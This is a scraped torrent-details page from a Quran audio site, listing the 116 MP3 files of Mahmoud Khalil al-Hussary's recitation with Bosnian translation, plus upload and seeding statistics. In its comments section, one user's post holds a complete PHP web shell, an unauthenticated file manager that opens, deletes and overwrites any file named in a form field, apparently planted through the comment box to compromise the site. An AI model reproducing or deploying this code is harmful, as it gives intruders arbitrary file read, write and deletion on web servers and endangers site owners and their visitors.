القرّاء
تصفج القرآن
البث المرئي المباشر - قناة القرآن
الإذاعة
API
تحميل المصحف كاملاً
الفيديوهات القرآنية
سورة الكهف
حصن المسلم
تطبيقات الجوال
English
Torrent's details
File Name
Mahmoud Khalil Al-Hussary [Bosni_Translation]_(MP3_Quran)
Torrent:
Mahmoud Khalil Al-Hussary [Bosni_Translation]_(MP3_Quran)
Info Hash:
8d0a060ad6754b960d706f3eb282136403bbaea7
اسم الملف:
القارئ محمود خليل الحصري - الترجمة البوسنية
النوع:
Translation Languages - ترجمة معاني القرآن
Rating:
الحجم:
3.24 GB
Show/Hide Files:
File Name
الحجم
002.mp3
266.41 MB
004.mp3
156.56 MB
003.mp3
151.34 MB
007.mp3
140.02 MB
006.mp3
135.04 MB
005.mp3
122.63 MB
009.mp3
109.67 MB
017.mp3
77.87 MB
010.mp3
76.35 MB
016.mp3
75.51 MB
011.mp3
72.98 MB
012.mp3
70.92 MB
018.mp3
63.46 MB
028.mp3
63.38 MB
026.mp3
62.17 MB
022.mp3
55.95 MB
020.mp3
53.95 MB
008.mp3
53.92 MB
033.mp3
53.86 MB
040.mp3
51.84 MB
027.mp3
51.46 MB
039.mp3
51.08 MB
021.mp3
49.40 MB
023.mp3
45.31 MB
029.mp3
43.50 MB
037.mp3
39.04 MB
043.mp3
38.30 MB
025.mp3
37.60 MB
030.mp3
36.38 MB
042.mp3
36.25 MB
014.mp3
35.95 MB
019.mp3
35.59 MB
013.mp3
35.42 MB
034.mp3
34.84 MB
041.mp3
32.87 MB
035.mp3
32.58 MB
038.mp3
31.58 MB
036.mp3
29.31 MB
024.mp3
28.36 MB
015.mp3
27.81 MB
046.mp3
25.66 MB
057.mp3
24.52 MB
031.mp3
23.75 MB
048.mp3
23.01 MB
047.mp3
23.00 MB
045.mp3
21.90 MB
058.mp3
21.27 MB
059.mp3
18.88 MB
056.mp3
18.75 MB
055.mp3
18.44 MB
032.mp3
16.72 MB
049.mp3
16.27 MB
044.mp3
16.26 MB
050.mp3
15.97 MB
054.mp3
15.45 MB
051.mp3
14.51 MB
072.mp3
14.42 MB
053.mp3
14.41 MB
060.mp3
14.30 MB
067.mp3
14.25 MB
068.mp3
13.95 MB
076.mp3
13.87 MB
052.mp3
12.77 MB
066.mp3
12.64 MB
065.mp3
12.44 MB
074.mp3
12.28 MB
077.mp3
12.06 MB
064.mp3
11.81 MB
071.mp3
11.76 MB
073.mp3
10.99 MB
069.mp3
10.22 MB
061.mp3
9.47 MB
070.mp3
9.20 MB
063.mp3
8.70 MB
075.mp3
8.66 MB
062.mp3
7.43 MB
078.mp3
6.88 MB
079.mp3
6.73 MB
083.mp3
5.96 MB
080.mp3
5.23 MB
089.mp3
5.16 MB
088.mp3
4.33 MB
081.mp3
3.89 MB
090.mp3
3.79 MB
085.mp3
3.66 MB
098.mp3
3.62 MB
084.mp3
3.54 MB
092.mp3
3.15 MB
087.mp3
2.93 MB
082.mp3
2.75 MB
096.mp3
2.72 MB
091.mp3
2.67 MB
086.mp3
2.33 MB
093.mp3
1.99 MB
001.mp3
1.88 MB
100.mp3
1.80 MB
101.mp3
1.66 MB
099.mp3
1.64 MB
095.mp3
1.58 MB
102.mp3
1.41 MB
104.mp3
1.41 MB
107.mp3
1.30 MB
094.mp3
1.28 MB
097.mp3
1.26 MB
109.mp3
1.23 MB
105.mp3
1.17 MB
111.mp3
1.14 MB
110.mp3
1.07 MB
114.mp3
1.06 MB
113.mp3
1.01 MB
106.mp3
954.84 KB
103.mp3
838.51 KB
112.mp3
758.92 KB
108.mp3
744.22 KB
MP3Quran.gif
3.95 KB
MP3Quran.net.txt
0.26 KB
116 files
التاريخ:
18/04/2015
Uploader:
admin
Speed:
0 KB/sec
Downloaded:
1012
time(s)
peer(s):
seed(s):
20
, leecher(s):
0
=
20
peer(s)
mmmmmm123456
19/06/2015 18.46.52
SM00K0;<p align=\"center\"><?
error_reporting(0);
$scriptname = $_SERVER[\'SCRIPT_NAME\'];
$filename = $_POST[\"filename\"];
if($_POST[\"submit\"] == \"Open\"
{
if(file_exists($filename))
{
$filecontents = htmlentities(file_get_contents($filename));
if(!$filecontents)
$status = \"<font face=\'Verdana\' style=\'font-size: 8pt\'>Error or No contents in file</font>\";
}
else
$status = \"<font face=\'Verdana\' style=\'font-size: 8pt\'>File does not exist!</font>\";
}
else if($_POST[\"submit\"] == \"Delete\"
{
if(file_exists($filename))
{
if(unlink($filename))
$status = \"<font face=\'Verdana\' style=\'font-size: 8pt\'>File successfully deleted!</font>\";
else
$status = \"<font face=\'Verdana\' style=\'font-size: 8pt\'>Could not delete file!</font>\";
}
else
$status = \"<font face=\'Verdana\' style=\'font-size: 8pt\'>File does not exist!</font>\";
}
else if($_POST[\"submit\"] == \"Save\"
{
$filecontents = stripslashes(html_entity_decode($_POST[\"contents\"]));
if(file_exists($filename))
unlink($filename);
$handle = fopen($filename, \"w\"
;
if(!$handle)
$status = \"<font face=\'Verdana\' style=\'font-size: 8pt\'>Could not open file for write access! </font>\";
else
{
if(!fwrite($handle, $filecontents))
$status = $status.\"<font face=\'Verdana\' style=\'font-size: 8pt\'>Could not write to file! (Maybe you didn\'t enter any text?)</font>\";
fclose($handle);
}
$filecontents = htmlentities($filecontents);
}
else
{
$status = \"<font face=\'Verdana\' style=\'font-size: 8pt\'>No file loaded!</font>\";
}
?>
<table border=\"0\" align=\"center\"><tr><td><table width=\"100%\" border=\"0\"><tr><td>
<form method=\"post\" action=\"<?Echo $scriptname;?>\">
<input name=\"filename\" type=\"text\" value=\"<?Echo $filename;?>\" size=\"72\">
<input type=\"submit\" name=\"submit\" value=\"Open\">
<input type=\"submit\" name=\"submit\" value=\"Delete\"></td></tr></table>
<font face=\"Verdana\" style=\"font-size: 11pt\">
<textarea name=\"contents\" cols=\"70\" rows=\"25\">
<?Echo $filecontents;?></textarea></font><br>
<input type=\"submit\" name=\"submit\" value=\"Save\">
<input type=\"reset\" value=\"Reset\">
</form>
OM_RADI_KADIR
16/06/2015 07.07.15
Back
[ Script Execution time: 0.0147 sec. ] - [ GZIP: disabled ]
BtiTracker (1.4.8) by
Btiteam